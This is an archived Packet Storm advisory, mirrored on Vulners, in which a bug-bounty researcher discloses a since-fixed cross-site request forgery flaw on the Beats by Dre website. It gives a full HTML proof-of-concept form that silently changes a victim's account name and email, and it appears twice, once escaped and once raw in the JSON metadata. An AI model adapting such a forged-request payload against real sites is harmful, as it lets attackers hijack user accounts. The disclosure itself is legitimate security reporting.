Search...

Beats By Dre Cross Site Request Forgery

2016-07-31T00:00:00

ID PACKETSTORM:138121
Type packetstorm
Reporter Aaditya Purani
Modified 2016-07-31T00:00:00

Description

                                        
                                            `Hello,  
  
I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )  
on Beats by Dr.Dre which could lead to full Account Takeover and  
Information change by Just sending a Malicious crafted Link to the user.  
  
Proof of Concept:  
  
&lt;html&gt;  
&lt;!-- CSRF PoC - By Aaditya Purani --&gt;  
&lt;body&gt;  
&lt;form method='POST' action="  
https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer  
"&gt;  
&lt;input type="hidden" name="firstName" value="hacked" /&gt;  
&lt;input type="hidden" name="lastName" value="hackerone" /&gt;  
&lt;input type="hidden" name="emailAddress" value="victimsemail@gmail.com" /&gt; &lt;  
input type="hidden" name="zip" value="" /&gt;  
&lt;input type="hidden" name="phone" value="" /&gt;  
&lt;input type="hidden" name="csrf_token" value="  
VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91  
" /&gt;  
&lt;input type="hidden" name="isEmailSubscription" value="true" /&gt;  
&lt;input type="hidden" name="isAlreadySubscribed" value="false" /&gt;  
&lt;input type="submit" value="Submit request" /&gt;  
&lt;/form&gt;  
&lt;/body&gt;  
&lt;/html&gt;  
  
Response :  
  
{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -&gt; Attack  
Successful  
  
{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } -&gt;  
Attack Unsuccessful  
  
  
Clicking on this Link, would change details of any User. I have wrote an  
Complete Blog here:  
https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/  
  
Video PoC: https://youtu.be/2SfmmWxiDck  
  
Apple has Acknowledged me in their Hall of fame:  
https://support.apple.com/en-us/HT201536  
  
*Timeline:*  
  
October 8th 2015 a Reported  
October 23th 2015 a Triaged  
November 6th 2015 a Responded that aMatter is being investigateda  
January 18th 2016 a Fixed  
June 20th 2016 a Acknowledged  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:138121", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Beats By Dre Cross Site Request Forgery", "description": "", "published": "2016-07-31T00:00:00", "modified": "2016-07-31T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/138121/Beats-By-Dre-Cross-Site-Request-Forgery.html", "reporter": "Aaditya Purani", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:29", "viewCount": 1, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2016-11-03T10:20:29", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:29", "rev": 2}, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/138121/bbd-xsrf.txt", "sourceData": "`Hello, \n \nI am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery ) \non Beats by Dr.Dre which could lead to full Account Takeover and \nInformation change by Just sending a Malicious crafted Link to the user. \n \nProof of Concept: \n \n<html> \n \n<body> \n<form method='POST' action=\" \nhttps://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer \n\"> \n<input type=\"hidden\" name=\"firstName\" value=\"hacked\" /> \n<input type=\"hidden\" name=\"lastName\" value=\"hackerone\" /> \n<input type=\"hidden\" name=\"emailAddress\" value=\"victimsemail@gmail.com\" /> < \ninput type=\"hidden\" name=\"zip\" value=\"\" /> \n<input type=\"hidden\" name=\"phone\" value=\"\" /> \n<input type=\"hidden\" name=\"csrf_token\" value=\" \nVxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91 \n\" /> \n<input type=\"hidden\" name=\"isEmailSubscription\" value=\"true\" /> \n<input type=\"hidden\" name=\"isAlreadySubscribed\" value=\"false\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n \nResponse : \n \n{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack \nSuccessful \n \n{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } -> \nAttack Unsuccessful \n \n \nClicking on this Link, would change details of any User. I have wrote an \nComplete Blog here: \nhttps://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/ \n \nVideo PoC: https://youtu.be/2SfmmWxiDck \n \nApple has Acknowledged me in their Hall of fame: \nhttps://support.apple.com/en-us/HT201536 \n \n*Timeline:* \n \nOctober 8th 2015 a Reported \nOctober 23th 2015 a Triaged \nNovember 6th 2015 a Responded that aMatter is being investigateda \nJanuary 18th 2016 a Fixed \nJune 20th 2016 a Acknowledged \n`\n"}